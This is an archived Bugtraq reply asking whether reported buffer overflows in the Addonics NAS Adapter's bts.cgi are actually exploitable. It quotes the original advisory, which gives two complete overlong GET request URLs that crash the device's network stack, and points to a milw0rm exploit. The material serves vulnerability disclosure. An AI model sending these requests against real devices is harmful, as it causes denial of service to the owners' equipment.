Re: Addonics NAS Adapter (bts.cgi) Remote DoS Exploit (post-auth)

To: mcyr2@xxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx
Subject: Re: Addonics NAS Adapter (bts.cgi) Remote DoS Exploit (post-auth)
From: Jeremy Brown <0xjbrown41@xxxxxxxxx>
Date: Mon, 20 Apr 2009 17:12:53 -0400
Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=+iqV/YEeCs4nXZH2uyJi2runUhqNenJC2uVLsJSRNXo=; b=htLZL8OszJ9fnigee6fMY8Aq+CYig7iR/fNh+ccjjLtyf2V5jlLUqasEnps3DW+Eoi 2bMupmyEykRJS/L5bVfoNl1ELPAIcPXiWAN22ORnjvitHVY09LxAzK5BY0qDI/MQIDhW cLgW1zY5hvLWiD3P2ID4uOADWiNKnAtFgkEQ8=
Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=EnWsztlPswPKTeE+BEEIYWxr3Q2UjEpOXNxqMrgjEKnG2LpT1XmcX4jzD6h5ln/0ne WESCgb331Lhlm8C1FSSOhvaNYkxLyrXXfPu2445FtDmW0V/EQirxgV9/k8hfJM9DNWog f+AwrVDOeP/NgWvqV7Ax8HAxug6zeQrAmRlJ0=
In-reply-to: <20090420201259.31349.qmail@xxxxxxxxxxxxxxxxx>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
References: <20090420201259.31349.qmail@xxxxxxxxxxxxxxxxx>

Have any of these buffer overflows been debugged and/or proven
exploitable? Is debugging practical on this device? More details may
suffice the mind.

On Mon, Apr 20, 2009 at 4:12 PM,  <mcyr2@xxxxxxx> wrote:
> Remote: Yes
> Local: No
> Credit: Mike Cyr, aka h00die
> Vulnerable: NASU2FW41 Loader 1.17
> Not Vulnerable:
>
> Discussion:
>
> Addonics NAS Adapter Post-Auth DoS
>
> Addonics NAS Adapter is prone to several post authentication buffer 
> overflows. Each of these buffer overflows will crash the entire TCP/IP stack 
> and the device will have to be power cycled to restore any functionality. 
> Addonics currently has implemented GUI level (client side) controls for 
> preventing long inputs, but by simply doing a direct HTTP GET request (the 
> device doesn't use POST) this can be bypassed.
>
> Addonics was notified of the buffer overflows via ticket 497283 on March 25, 
> 2009.  Vendor acknowledgment on March 26, 2009.
>
> Exploiting these issues will crash the network stack and create a Denial of 
> Service condition.
>
> Firmware NASU2FW41 Loader1.17 are vulnerable; other versions may also be.
>
> Exploit:
>
> http://www.milw0rm.com/exploits/8490
>
> Attackers can use a browser to exploit these issues.
>
> The following GET requests will result in the TCP/IP stack crashing and the 
> device requiring a reboot
>
> 1. Bittorrent: Download Path
>
> http://<ip>/bts.cgi?redirect=bt.htm&failure=fail.htm&type=bt_search_apply&torrent_path=&download_path=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
>
> 2. Bittorent: torrent path
>
> http://<ip>/bts.cgi?redirect=bt.htm&failure=fail.htm&type=bt_search_apply&torrent_path=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&download_path=PUBLIC
>
>
>
> References:
>
> Vendor/Product Website: http://www.addonics.com/products/nas/nasu2.asp
>

References:
- Addonics NAS Adapter (bts.cgi) Remote DoS Exploit (post-auth)
  - From: mcyr2

Prev by Date: [SECURITY] [DSA 1776-1] New slurm-llnl packages fix privilege escalation
Next by Date: Re: Trend Micro OfficeScan Client - DOS
Previous by thread: Addonics NAS Adapter (bts.cgi) Remote DoS Exploit (post-auth)
Next by thread: [USN-761-1] PHP vulnerabilities
Index(es):
- Date
- Thread